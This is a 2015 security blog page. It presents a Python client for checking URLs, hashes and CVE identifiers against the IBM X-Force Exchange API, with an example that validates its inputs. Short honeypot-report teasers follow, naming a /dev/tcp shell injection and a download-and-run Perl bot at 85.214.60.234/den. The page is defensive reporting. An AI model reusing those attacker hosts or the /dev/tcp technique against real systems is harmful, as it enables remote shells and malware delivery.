
Thursday, 25 June 2015

IBM X-Force Exchange - my client script

As some of you may know, my SendMeSpamIDS includes a script to check data against the IBM X-Force Exchange API.


As this script was hidden within a subfolder, I decided to turn it into a standalone GitHub project:


Usage: XFupload.py [options]
Options:
  -h, --help            show this help message and exit
  -u scanurl, --url=scanurl
                        URL to be checked by Exchange IBM Xforce
  -m scanurl, --malware=scanurl
                        Malware to be checked by Exchange IBM Xforce
  -f filename, --file=filename
                        file (md5 hash) to be checked by Exchange IBM Xforce
  -x xfid, --xfid=xfid  XFID to be used
  -c cve-xxx-xxx, --cve=cve-xxx-xxx
                        CVE, BID, US-Cert, UV#, RHSA id to be searched

From time to time I add improvements to this script, so stay tuned for changes.

The script was developed and tested on:
  • Windows 7 Pro (including Visual Studio + Python)
  • Ubuntu and Debian
  • Raspberry Pi with Debian
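To show what such a client has to get right before it talks to the API, here is an added example written for this page; it is not XFupload.py and not IBM's code. It maps the script's -u / -m / -c options to request paths, validates the hash and identifier before they are placed into the path, percent-encodes a URL so it stays a single path segment, and reads the fields a triage script wants out of a response. The base URL https://api.xforce.ibmcloud.com, the paths /url/, /malware/ and /vulnerabilities/search/, HTTP Basic authentication with key:password, and the response layout read by parse_url_report are assumptions (check them against the current IBM documentation); the sample response is constructed so the module runs offline.

```python
"""X-Force Exchange lookup helper (added example, not the blog's XFupload.py).

Assumptions (not from the original post): the API base URL and paths below,
HTTP Basic auth with apikey:password, and the JSON layout read in
parse_url_report. SAMPLE_URL_RESPONSE is constructed test data.
"""
import base64
import json
import re
import urllib.parse
import urllib.request

BASE_URL = "https://api.xforce.ibmcloud.com"          # assumed endpoint
MD5_RE = re.compile(r"^[0-9a-fA-F]{32}$")              # -m / -f take an MD5
# CVE, BID, VU#, RHSA-2015:1234 ... letters, digits and a few separators only
IDENT_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9#:._-]*$")


def auth_header(api_key, api_password):
    """HTTP Basic credentials (key:password), as assumed for the X-Force API."""
    token = base64.b64encode(f"{api_key}:{api_password}".encode()).decode()
    return {"Authorization": "Basic " + token, "Accept": "application/json"}


def build_request_path(kind, value):
    """Map a CLI option (url / malware / cve) to a request path.

    Everything user-supplied is validated or percent-encoded before it is
    joined into the path, so a '/' or '?' inside the value cannot redirect the
    request to another endpoint or smuggle query parameters.
    """
    if kind == "url":
        # safe="" also encodes '/', so the whole URL is one path segment
        return "/url/" + urllib.parse.quote(value.strip(), safe="")
    if kind == "malware":
        if not MD5_RE.match(value):
            raise ValueError("malware lookup expects a 32-hex-digit MD5")
        return "/malware/" + value.lower()
    if kind == "cve":
        ident = value.strip()
        if not IDENT_RE.match(ident):
            raise ValueError("identifier contains characters outside [A-Za-z0-9#:._-]")
        return "/vulnerabilities/search/" + urllib.parse.quote(ident.upper(), safe="")
    raise ValueError(f"unknown lookup kind: {kind}")


def lookup(kind, value, api_key, api_password, opener=urllib.request.urlopen):
    """Perform the HTTP GET; 'opener' is injectable so tests need no network."""
    req = urllib.request.Request(
        BASE_URL + build_request_path(kind, value),
        headers=auth_header(api_key, api_password),
    )
    with opener(req, timeout=20) as resp:
        return resp.read().decode("utf-8")


def parse_url_report(body):
    """Reduce a /url/ response to url, score and category names (assumed layout)."""
    result = json.loads(body).get("result", {})
    return {
        "url": result.get("url"),
        "score": result.get("score"),
        "categories": sorted(result.get("cats", {}).keys()),
    }


# Constructed sample, not a real API reply; layout follows the assumption above.
SAMPLE_URL_RESPONSE = json.dumps({
    "result": {
        "url": "example.invalid/den",
        "score": 9,
        "cats": {"Malware": True, "Botnet Command and Control Server": True},
    }
})


if __name__ == "__main__":
    print(build_request_path("url", "http://85.214.60.234/den"))
    print(build_request_path("cve", "RHSA-2015:1234"))
    print(parse_url_report(SAMPLE_URL_RESPONSE))
```

Passing the real key to lookup() is the only step that touches the network; everything else can be exercised against the constructed sample, which is how a check like this belongs in an IDS pipeline that must not stall when the API is unreachable.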

Thursday, 18 June 2015

SendMeSpam: Shell injection attack: /dev/tcp/74.208.79.34/21 --...

SendMeSpam: Shell injection attack: /dev/tcp/74.208.79.34/21 --...: My honeypot was attacked by Jun 18 06:42:08 beeswarm [mypyfwa] 2015-06-18 06:42:08.029145 213.165.70.245 - - [17/Jun/2015:16:11:21 +0200] ...

Monday, 15 June 2015

SendMeSpam: JST IrcBot revisited

SendMeSpam: JST IrcBot revisited: Maybe you remember the shell injection I reported yesterday. This morning I took the time to read a bit through the code of JST Perl IrcBot...

Sunday, 14 June 2015

SendMeSpam: Perl script injection: 85.214.60.234/den

SendMeSpam: Perl script injection: 85.214.60.234/den: The last two days several shell injections have hit my honeypot. Each of them tried to download a Perl script and execute it Jun 13 06:42:11 ...